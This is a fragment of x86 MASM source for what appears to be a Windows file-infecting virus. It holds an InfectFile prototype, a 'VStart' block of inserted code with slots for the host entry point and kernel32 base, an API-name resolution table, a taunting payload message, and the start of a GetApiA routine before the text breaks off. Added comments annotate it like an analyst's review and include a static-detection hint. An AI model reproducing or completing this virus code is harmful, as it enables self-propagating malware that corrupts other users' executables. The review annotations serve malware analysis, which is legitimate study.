.386
.model flat,stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib
;##########
InfectFile proto :dword
GetApiA proto :DWORD,:DWORD
;#########
.code
;############### Inserted code ############################
; Data block that opens the region labelled VStart. Everything below is
; declared inside .code, so it is assembled into the executable section
; together with the procedures that follow.
; NOTE(review): the original comment reads "inserted code" and the file
; declares an InfectFile proto, so VStart presumably marks the start of the
; body that is written into another executable - confirm against the rest of
; the file.
; Detection note: variables that live in .code can only be updated at run time
; if that section is mapped writable as well as executable. A W+X section, plus
; the plain-ASCII API and DLL names below sitting next to empty address slots,
; is a useful static-triage indicator. The writes themselves are not visible
; in this chunk.
VStart:
; Three uninitialised dwords. The names suggest: base of the running image,
; base of kernel32, and the host program's entry point - TODO confirm
; where each one is filled in.
appBase dd ?
k32Base dd ?
HostEntry dd ?
;#############################################
; NUL-terminated API names (ANSI variants where the API has an A/W pair).
sGetModuleHandle db "GetModuleHandleA",0
sGetProcAddress db "GetProcAddress",0
sExitProcess db "ExitProcess",0
sLoadLibrary db "LoadLibraryA",0
sMessageBoxA db "MessageBoxA",0
; One zero-initialised dword per API name above, declared in the same order.
; Presumably these receive the resolved function addresses - verify in the
; code that walks lpApiAddrs.
aGetModuleHandle dd 0
aGetProcAddress dd 0
aExitProcess dd 0
aLoadLibrary dd 0
aMessageBoxA dd 0
; NUL-terminated DLL names.
u32 db "User32.dll",0
k32 db "Kernel32.dll",0
; Display strings: sztit is an author tag ("by <handle>"), szMsg is roughly
; "I got in, hehe!". Presumably the MessageBoxA title and text - the call is
; not visible here.
sztit db "by 无理取闹",0
szMsg db "我进来了,呵呵!",0
; 256-byte uninitialised scratch buffer; its use is not visible in this chunk.
szBuffer db 256 dup (?)
; Table of offsets to the API-name strings, ended by a zero dword.
; The four entries follow the same order as aGetModuleHandle..aLoadLibrary;
; sMessageBoxA has no entry in this table.
lpApiAddrs label near
dd offset sGetModuleHandle
dd offset sGetProcAddress
dd offset sExitProcess
dd offset sLoadLibrary
dd 0
;################ Get API #########################################################
GetApiA proc Base:DWORD,sApi:DWORD
local @dwStringLength
local @return
pushad
;#############计算api的长度#########################
mov edi,sApi
mov ecx,-1
xor al,al
cld
repnz scasb
mov ecx,edi
sub